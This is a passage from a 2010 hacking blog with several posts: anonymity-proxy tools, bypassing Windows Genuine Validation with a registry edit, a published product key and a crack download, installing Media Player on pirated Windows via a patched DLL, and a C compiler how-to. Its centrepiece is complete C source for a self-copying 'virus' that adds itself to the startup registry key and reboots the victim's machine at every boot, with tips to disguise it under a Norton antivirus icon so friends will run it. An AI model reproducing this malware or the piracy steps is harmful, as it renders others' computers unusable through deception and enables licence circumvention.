}</time.h></stdlib.h></stdio.h></div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-36708999027537979672010-08-03T15:54:00.002-07:002010-08-03T15:54:32.280-07:00Free Anonymous web surfing with Ultrasurf<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUE8H7DRPfwUUJIGVG4ywHVH45LREa154Ww746zGyA0fKqP8B8XN9PcPyEyBvGJe3HDxsQEaIkLdywQI5HEyhFaUd37BA4xjOCSGAeRaxklki4d-eQwWUSJWFGPu8zo4dXM5boqHfd4xQ/s1600/Anonymous+web+surfing.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Anonymous web surfing" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUE8H7DRPfwUUJIGVG4ywHVH45LREa154Ww746zGyA0fKqP8B8XN9PcPyEyBvGJe3HDxsQEaIkLdywQI5HEyhFaUd37BA4xjOCSGAeRaxklki4d-eQwWUSJWFGPu8zo4dXM5boqHfd4xQ/s320/Anonymous+web+surfing.jpeg" /></a></div>If any of you are banned from forums or any other internet group, or wanted to bypass Rapidshare unlimited download or wanted to bypass school <span class="IL_AD" id="IL_AD1">firewall</span> to acess sites like Facebook,orkut,myspace etc.In this post i have mentioned about a tool called Ultrasurf to browse the web anonymously.I had preveiously posted on<span style="color: #3d85c6;"> </span><b><a href="http://rayahari.blogspot.com/2010/08/hide-your-ip-address.html" style="color: #3d85c6;">IP Hiding Method</a></b> for anonymous browsing,.Today i will tell you on how to use <b>Ultrasurf for anonymous web surfing</b>.<br />
<br />
<a href="" name="more"></a><b>Ultrasurf</b> is totally free software used to <span class="IL_AD" id="IL_AD3">surf anonymously</span>. It is better than any other anonymous browsing software. Infact, it searches for 3 fast <span class="IL_AD" id="IL_AD4">proxy servers</span>, assigns percentage(%) indicating speed of proxy servers and we can choose any of three.<br />
<br />
<b>Using ultrasurf for anonymous web surfing</b>:<br />
<br />
<b>1.</b>First of all download <a href="http://sharecash.org/download.php?file=810329" style="color: #3d85c6;"><b>Ultrasurf</b></a><br />
<b>2.</b>Now extract the contents from the<b> </b>file<br />
<b>3.</b>Now log on to <a href="http://www.whatismyipaddress.com/" style="color: #3d85c6;"><b> www.whatismyipaddress.com </b></a>and check your current <b>IP address </b><br />
<b>4.</b>Run <b>u.exe</b><br />
<br />
You will see a window like this:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-XHnID62Rx7_gXpbrky6JdPw8ErbeeO1KsITRKzmKIUdUUiKhnyZRoUKgAcZ39EBP5ZrvfLZiaAfK_-dXTLimlzdZ8iJAsPwNxIJO06Q4UIkh6ujrb7nV7E7DtB89LVlILtWQ8Z4ZmI4/s1600/ultrasurf.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Anonymous web surfing" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-XHnID62Rx7_gXpbrky6JdPw8ErbeeO1KsITRKzmKIUdUUiKhnyZRoUKgAcZ39EBP5ZrvfLZiaAfK_-dXTLimlzdZ8iJAsPwNxIJO06Q4UIkh6ujrb7nV7E7DtB89LVlILtWQ8Z4ZmI4/s320/ultrasurf.bmp" /></a></div><b> </b><br />
<br />
<b>5.</b>Now, you can see three proxy servers with their speed percentages.<br />
<b>6.</b> Just select the proxy server with max speed.<br />
<b>7.</b>And you are Done.<br />
<br />
Now just log in to <a href="http://www.whatismyipaddress.com/" style="color: #3d85c6;"><b> www.whatismyipaddress.com</b></a> and see your newly changed<b> IP Address.This Method is only for Internet explorer users</b>,I will soon post an article on Anonymous Browsing with firefox and other browsers <div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-11571163396568835312010-08-03T15:54:00.001-07:002010-08-03T15:54:15.217-07:00Hide your IP address<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Your IP is exposed when ever you visit a website,when your Ip gets exposed it becomes easy to trace you and find out your personal information,Hackers can use your Ip to gain access to your personal files and documents and even can get into your paypal,alert etc accounts,</span></span><b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Hide the Ip</span></span></b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"> is a Software which masks your IP with one click and you can surf web anonymously,on the other hand Hackers can use this software to hide theiridentity and not get caught,its benificial for all and i recommend that every Pc should have this software installed</span></span><br />
<br />
<div style="margin: 0px;"><span class="Apple-style-span" style="line-height: 24px;"><strong style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Hide the IP</span></span></strong><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"> to be the best one. It’s </span></span><strong style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">ease of use</span></span></strong><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">, </span></span><strong style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">reliability</span></span></strong><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">, </span></span><strong style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">wide range of options</span></span></strong><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">, </span></span><strong style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">speed</span></span></strong><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"> and </span></span><strong style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">unmatchable price</span></span></strong><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"> were on top when compared to that of the remaining IP Hising softwares on the market.</span></span></span></div><div style="margin: 0px;"><span class="Apple-style-span" style="line-height: 24px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span> </span></div><div style="margin: 0px;"><span class="Apple-style-span" style="line-height: 24px;"><span class="Apple-style-span" style="line-height: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><img src="http://www.hide-the-ip.com/banners_new/box.jpg" /></span></span></span></span></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="line-height: 24px;"></span></span></span><br />
<h3 style="color: #303030; font: 1.3em Arial; margin: 0px 0px 3px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Key Features of </span></span><span style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><b><span class="Apple-style-span" style="color: #cc0000;">Hide the IP:</span></b></span></span></span></h3><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Hide IP Address »</span></span></b><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"> Single click to completely hide your Online Identity. Others will see a fake IP address masking your real IP, thus, protecting your privacy.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Select Your Physical IP Location »</span></span></b><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">You decide which country will be indicated as your origin by simply choosing from a country list. We have hundreds, hourly updated, IP addresses available for use.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Anonymous Web Surfing »</span></span></b><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"> You are protected from hackers who will be tricked by your fake IP instead of your real. They will never be able to find any information about you by tracing the fake IP.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Send Anonymous E-mails » Hide your IP in E-mail headers. Be protected while sending emails from Yahoo!, Hotmail, GMail. Upgrading to Platinum Service add-on will protect you in Outlook!</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Bypass Website Country Restrictions » </span></span></b><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Surf websites which are restricted for your country. Surf in forums on which you were banned.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="line-height: 24px;"></span></span></span><br />
<div style="margin: 0px 0px 15px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Supports Internet Explorer, Firefox, Google Chrome, Safari, Opera.</span></span></div><div style="margin: 0px 0px 15px; padding: 0px;"><strong style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">So what are you waiting for? </span></span></strong><strong style="margin: 0px; padding: 0px;"><a href="http://www.hide-the-ip.com/203-download.shtml"><span class="Apple-style-span" style="color: #3d85c6;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;">Download the free trial</span></span></span></a></strong><strong style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: small;"> and test Hide the IP on your computer now! For more information on Hide the IP visit the following link.</span></span></strong></div><h3 style="font: 1.3em Arial; margin: 0px 0px 3px; padding: 0px;"><a href="http://www.hide-the-ip.com/203-hide-my-ip.shtml"><span class="Apple-style-span" style="color: #cc0000;"><b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-large;">Hide the IP</span></span></b></span></a></h3><div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com1tag:blogger.com,1999:blog-5938474543606888364.post-54869838824145653622010-08-03T15:52:00.001-07:002010-08-03T15:52:30.770-07:00Install media player 11 on Priated windows<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIxxDn-YvDSmENVM7UQp2On5bKjY1_AEckat5eeleeabjOrb22t0qAyxPhLBkKxGZZv5j1B-_c3PIS1Xg-i9WP_47nu-K5UFezfNowzCOVS6Omn5pFw-ARkNv0RhdoBVWeAucZrJXqqwM/s1600/wmp11_hero-2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Make windows xp geniune" border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIxxDn-YvDSmENVM7UQp2On5bKjY1_AEckat5eeleeabjOrb22t0qAyxPhLBkKxGZZv5j1B-_c3PIS1Xg-i9WP_47nu-K5UFezfNowzCOVS6Omn5pFw-ARkNv0RhdoBVWeAucZrJXqqwM/s320/wmp11_hero-2.gif" width="320" /></a></div>Windows media player 11 offers you great ways to store and enjoy all your music, video and pictures along with its new cool look.However if you do not have a geniune pack of windows service pack 2 you will not be able to run and install windows media player.I have already posted article on <b><a href="http://rayahari.blogspot.com/2010/08/make-windows-genuine-in-minute.html" style="color: #3d85c6;">How to make windows xp geniune</a></b>.<br />
<a href="" name="more"></a>Here are the steps to Install windows media player 11 in priated windows<br />
<br />
<b>1.</b> Download Windows Media Player 11.0 (make sure its the final and latest version, not beta) from the <b><a href="http://www.microsoft.com/windows/windowsmedia/player/download/download.aspx" style="color: #3d85c6;">Microsoft Site</a></b>.<br />
<b>2.</b> Extract the downloaded Windows Media Player setup file (<b>wmp11-windowsxp-x86-enu.exe</b>) using <b><a href="http://www.rarlabs.com/"><span style="color: #3d85c6;">WinRAR</span></a></b> to a directory (<b>wmp11-windowsxp-x86-enu</b>). Now make sure you have a “LegitLibM.dll” file in the extracted “wmp11-windowsxp-x86-enu” folder.<br />
<br />
<b>3.</b>Download the patched <b><a href="http://sharecash.org/download.php?file=857602"><span style="color: #3d85c6;">LegitLibM.dll</span></a></b> and then copy-paste it to the “<b>wmp11-windowsxp-x86-enu</b>” folder and click yes when asked to overwrite.<br />
<b><br />
</b><br />
<b>4.</b> Now run “<b>setup_wm.exe</b>” file in the “<b>wmp11-windowsxp-x86-enu</b>” folder.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI2lOeplrvkBa61uCwkkbVvnZpIiaRp5y3_yHJlc8qKWYBosm_0NzZSuQWDzbMjH2rRQIDYEoZqWpCI55v0b_e_YeEaE7M5Xh04PhfLZKwCWNB1nqiTLnAUc5Xdiy9Y1lZ_lvVFY0NEoo/s1600/wmp11_hero-2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv-VP_VvIcpv53Kk4aRFiomTDNUvVOSYDyqrkLGgB9tuPGc-ge3-XSFPdhppU65iEMLCsMFmdzuHIIf6ZucU2_DE7O5IMbQrIegZK_r_ugHNeeZdOb4OZEsuMNvkEB8eULug1y0eaFqLg/s1600/DLL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv-VP_VvIcpv53Kk4aRFiomTDNUvVOSYDyqrkLGgB9tuPGc-ge3-XSFPdhppU65iEMLCsMFmdzuHIIf6ZucU2_DE7O5IMbQrIegZK_r_ugHNeeZdOb4OZEsuMNvkEB8eULug1y0eaFqLg/s400/DLL.png" width="400" /></a></div><b> 5.</b><span class="fullpost">Restart your PC, then run your Windows Media Player and you are done!</span><div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-41207486815652659692010-08-03T15:52:00.000-07:002010-08-03T15:52:13.044-07:00Make windows genuine in a minute<b style="margin: 0px; padding: 0px;"> </b> <br />
<div> </div><div class="post-body entry-content"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzgQYMgmnaJtY6Yx5jrM2bzDTNmYL_xzHaD4NU0rIrJJKHoiuf3YfN_zppkXRrCQkcwuDl6zgxB6sbW7JIbs5RFSlMTDe6WIDNfQCGXRtUXRSzLkKRspHpBMk54n1wYRM5iep-aT9mebE/s1600-h/images+xp.jpg"><img alt="Make windows genuine" border="0" id="BLOGGER_PHOTO_ID_5317780943292661282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzgQYMgmnaJtY6Yx5jrM2bzDTNmYL_xzHaD4NU0rIrJJKHoiuf3YfN_zppkXRrCQkcwuDl6zgxB6sbW7JIbs5RFSlMTDe6WIDNfQCGXRtUXRSzLkKRspHpBMk54n1wYRM5iep-aT9mebE/s320/images+xp.jpg" style="cursor: pointer; display: block; height: 86px; margin: 0px auto 10px; text-align: center; width: 129px;" /></a><br />
Make your Windows XP with Service Pack 2 geniune. Im not sure if this works on SP3.<br />
<br />
This procedure described below will allow you to <b>bypass the Microsoft Genuine Validatio</b>n.<br />
I hope this is the best way to <b>make your copy of windows xp geniune.</b><br />
<br />
<a href="" name="more"></a><b>Step 1:</b><br />
Click <b>Start</b> and then goto <b>run</b> and type ‘<b>regedit</b>’<br />
<br />
<b>Step 2:</b><br />
Registry window will be opened, Then Go to<br />
<b><span class="Apple-style-span" style="color: #cc0000;">HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer</span></b><br />
<br />
<span class="fullpost">and double click on it. Then change some of the value data to any thing.</span><br />
<span class="fullpost"><br />
<b>Step 3:</b></span><br />
<span class="fullpost">Go to start > run > “<b>%systemroot%\system32\oobe\msoobe.exe /a</b>” (again, dont type the quotes)<br />
<br />
<b>Step 4:</b></span><br />
<span class="fullpost">The activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: <b>JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ</b>.<br />
<br />
Now you can download all the updates without activating, and the Genuine Microsoft Validation will irritate you No more.<br />
<br />
<b> Note: This works better after reformating</b><br />
<br />
Or else do you want to download the crack for XP,XP home,XP 2 and Vista, I am placing it in a zip folder pls download it from the below link<br />
<br />
<span style="color: #663399;"><b>http://rapidshare.com/files/71090926/Crack_For_XP.rar</b></span></span></div><div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-31218117830305885242010-08-02T19:35:00.001-07:002010-08-02T19:35:43.559-07:00A Virus Program to Restart the Computer at Every Startup<div class="separator" style="clear: both; text-align: center;"><a href="http://www.gohacking.com/wp-content/uploads/2008/12/virus.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://www.gohacking.com/wp-content/uploads/2008/12/virus.jpg" /></a></div><br />
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.<br />
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, <strong>none of the antivirus softwares detect’s this as a virus </strong>since I have coded this virus in <strong>C</strong>. So if you are familiar with <strong>C language</strong> then it’s too easy to understand the logic behind the coding.<br />
Here is the source code.<br />
<div class="stb-info_box">#include<stdio.h><br />
#include<dos.h><br />
#include<dir.h> int found,drive_no;char buff[128];<br />
void findroot()<br />
{<br />
int done;<br />
struct ffblk ffblk; <span style="color: #990000;">//File block structure</span><br />
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); <span style="color: #990000;">//to determine the root drive</span><br />
if(done==0)<br />
{<br />
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); <span style="color: #990000;">//to determine whether the virus is already installed or not</span><br />
if(done==0)<br />
{<br />
found=1; <span style="color: #990000;">//means that the system is already infected</span><br />
return;<br />
}<br />
drive_no=1;<br />
return;<br />
}<br />
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if<br />
(done==0)<br />
{<br />
found=1;return;<br />
}<br />
drive_no=2;<br />
return;<br />
}<br />
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if(done==0)<br />
{<br />
found=1;<br />
return;<br />
}<br />
drive_no=3;<br />
return;<br />
}<br />
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if(done==0)<br />
{<br />
found=1;<br />
return;<br />
}<br />
drive_no=4;<br />
return;<br />
}<br />
else<br />
exit(0);<br />
}<br />
void main()<br />
{<br />
FILE *self,*target;<br />
findroot();<br />
if(found==0) <span style="color: #990000;">//if the system is not already infected</span><br />
{<br />
self=fopen(_argv[0],”rb”); <span style="color: #990000;">//The virus file open’s itself</span><br />
switch(drive_no)<br />
{<br />
case 1:<br />
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); <span style="color: #990000;">//to place a copy of itself in a remote place</span><br />
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
CurrentVersion\\Run \/v sres \/t REG_SZ \/d<br />
C:\\windows\\system\\ sysres.exe”); <span style="color: #990000;">//put this file to registry for starup</span><br />
break;<br />
case 2:<br />
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
CurrentVersion\\Run \/v sres \/t REG_SZ \/d<br />
D:\\windows\\system\\sysres.exe”);<br />
break;<br />
case 3:<br />
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
CurrentVersion\\Run \/v sres \/t REG_SZ \/d<br />
E:\\windows\\system\\sysres.exe”);<br />
break;<br />
case 4:<br />
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
CurrentVersion\\Run \/v sres \/t REG_SZ \/d<br />
F:\\windows\\system\\sysres.exe”);<br />
break;<br />
default:<br />
exit(0);<br />
}<br />
while(fread(buff,1,1,self)>0)<br />
fwrite(buff,1,1,target);<br />
fcloseall();<br />
}<br />
else<br />
system(“shutdown -r -t 0″); <span style="color: #990000;">//if the system is already infected then just give a command to restart<br />
</span>}</dir.h></dos.h></stdio.h></div><div class="stb-warning_box"><strong>NOTE:</strong> <span style="color: #990000;">COMMENTS ARE GIVEN IN BROWN COLOUR.</span></div><div> </div><strong>Compiling The Scource Code Into Executable Virus.</strong><br />
<div> </div>1. Download the <a href="http://www.gohacking.com/downloads/source_codes/SysRes.rar" rel="nofollow"><strong>Source Code Here</strong></a><br />
2. The downloaded file will be <strong>Sysres.C</strong><br />
3. For step-by-step compilation guide, refer my post <a href="http://rayahari.blogspot.com/2010/08/how-to-compile-c-programs.html" target="_blank">How to compile C Programs</a>.<br />
<div> </div><strong>Testing And Removing The Virus From Your PC</strong><br />
<div> </div>You can compile and test this virus on your own PC without any fear. To test, just doubleclick the <strong>sysres.exe</strong> file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.<br />
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.<br />
<div> </div>1. Reboot your computer in the <strong>SAFE MODE</strong><br />
2. Goto <br />
<div class="stb-info_box"><strong> X:\Windows\System</strong></div>(<strong>X</strong> can be C,D,E or F) 3.You will find a file by name <strong>sysres.exe</strong>, delete it.<br />
4.Type <strong>regedit </strong>in <strong>run</strong>.You will goto registry editor.Here navigate to<br />
<div class="stb-info_box"><strong>HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run</strong></div><br />
There, on the right site you will see an entry by name “<strong>sres</strong>“.Delete this entry.That’s it.You have removed this Virus successfully. <div> </div><strong>Logic Behind The Working Of The Virus</strong><br />
<div> </div>If I don’t explain the logic(<strong>Algorithm</strong>) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program.<strong> If you have further doubts please pass comments.</strong><br />
<div> </div><strong>LOGIC:</strong><br />
<div> </div>1. First the virus will find the Root partition (Partition on which Windows is installed).<br />
2. Next it will determine whether the Virus file is already copied(Already infected) into <strong>X:\Windows\System</strong><br />
3. If not it will just place a copy of itself into <strong>X:\Windows\System</strong> and makes a registry entry to put this virus file onto the startup.<br />
4. Or else if the virus is already found in the <strong>X:\Windows\System</strong> directory(folder), then it just gives a command to <strong>restart</strong> the computer.<br />
This process is repeated every time the PC is restarted.<br />
<div class="stb-warning_box"><strong>NOTE: </strong>The system will not be restarted as soon as you double click the <strong>Sysres.exe</strong> file.The restarting process will occur from the next boot of the system.</div><div> </div><strong><span style="font-size: 130%;">AND ONE MORE THING BEFORE YOU LEAVE</span> (This Step is optional)</strong><br />
<div> </div>After you compile, the <strong>Sysres.exe</strong> file that you get will have a <strong>default icon</strong>. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this <strong>Sysres.exe</strong> file into any other ICON that is more trusted and looks attractive.<br />
For example you can change the <strong>.exe</strong> file’s icon into <strong>Norton antivirus</strong> ICON itself so that the people seeing this file beleives that it is <strong>Norton antivirus</strong>. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.<br />
The detailed tutorial on changing the ICON is given in my post <a href="http://rayahari.blogspot.com/2010/07/how-to-change-icon-of-exe-file.html"><strong>How To Change The ICON Of An EXE File</strong></a> .<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://www.gohacking.com/wp-content/uploads/2008/12/virus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-45864552845758791462010-08-02T19:35:00.000-07:002010-08-02T19:35:00.104-07:00How to Compile C ProgramsIn many of my previous posts especially in the VIRUS CREATION section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs. <br />
<div> </div><h3>How to install Borland C++ compiler</h3><div> </div>1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.<br />
<a href="http://www.codegear.com/downloads/free/cppbuilder" rel="nofollow" target="_blank">http://www.codegear.com/downloads/free/cppbuilder</a><br />
2. After you download, run <strong>freecommandlinetools.exe</strong>. The default installation path would be<br />
<div class="stb-info_box">C:\Borland\BCC55</div><div> </div><h3>How to configure Borland C++ compiler</h3><div> </div>1. After you install Borland C++ compier, create two new Text Documents<br />
2. Open the first <strong>New Text Document.txt</strong> file and add the following two lines into it<br />
<div class="stb-info_box"><em>-I”c:\Borland\Bcc55\include”</em> <em>-L”c:\Borland\Bcc55\lib”</em></div>Save changes and close the file. Now rename the file from <strong>New Text Document.txt </strong>to <strong>bcc32.cfg.</strong><br />
3. Open the second <strong>New Text Document (2).txt</strong> file and add the following line into it<br />
<div class="stb-info_box"><span style="color: #333333;"><em><span style="color: black;">-L”c:\Borland\Bcc55\lib”</span></em></span></div>Save changes and close the file. Now rename the file from <strong>New Text Document (2).txt </strong>to <strong>ilink32.cfg.</strong><br />
4. Now copy the two files <strong>bcc32.cfg</strong> and <strong>ilink32.cfg</strong>, navigate to <em><strong>C:\Borland\BCC55\Bin</strong></em> and paste them.<br />
<div> </div><h3>How to compile the C source code (.C files)</h3><div> </div>1. You need to place the .C (example.c) file to be compiled in the following location<br />
<div class="stb-info_box"><em>C:\Borland\BCC55\Bin</em></div>2. Now goto command prompt (Start->Run->type <strong>cmd</strong>->Enter)<br />
3. Make the following path as the present working directory (use CD command)<br />
<div class="stb-info_box"><em>C:\Borland\BCC55\Bin</em></div>4. To compile the file (example.c) use the following command<br />
<div class="stb-container" id="stb-container"><div class="stb-info-caption_box stb_caption">Command to Compile C Program</div><div class="stb-info-body_box stb_body"><strong>bcc32 example.c</strong></div></div>5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (<em>C:\Borland\BCC55\Bin).</em><br />
6. Now you have successfully compiled the source code into an executable file(.exe file).<br />
<div class="stb-warning_box"><em><strong>NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).</strong></em></div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-86835571917248700582010-08-02T19:29:00.001-07:002010-08-02T19:29:26.594-07:00Changing Windows XP Product Key without Re-Installation<div class="separator" style="clear: both; text-align: center;"><a href="http://www.gohacking.com/wp-content/uploads/2008/12/xp-key-150x150.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://www.gohacking.com/wp-content/uploads/2008/12/xp-key-150x150.jpg" /></a></div>This trick will show you how to change Windows XP product key without re-installing the operating system. This makes it possible to install a new genuine key without the need to format and re-install your Windows XP.<br />
<br />
<div> </div><div> </div>1. Goto start menu, run, type regedit<br />
2. In registry editor goto<br />
<div class="stb-info_box"><strong>HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENT VERSION\WPA EVENTS</strong></div>3. In the right panel open OOBE Timer<br />
4. Edit/Change atleast one entry there, press OK and close registry editor.<br />
5. In run type the following command<br />
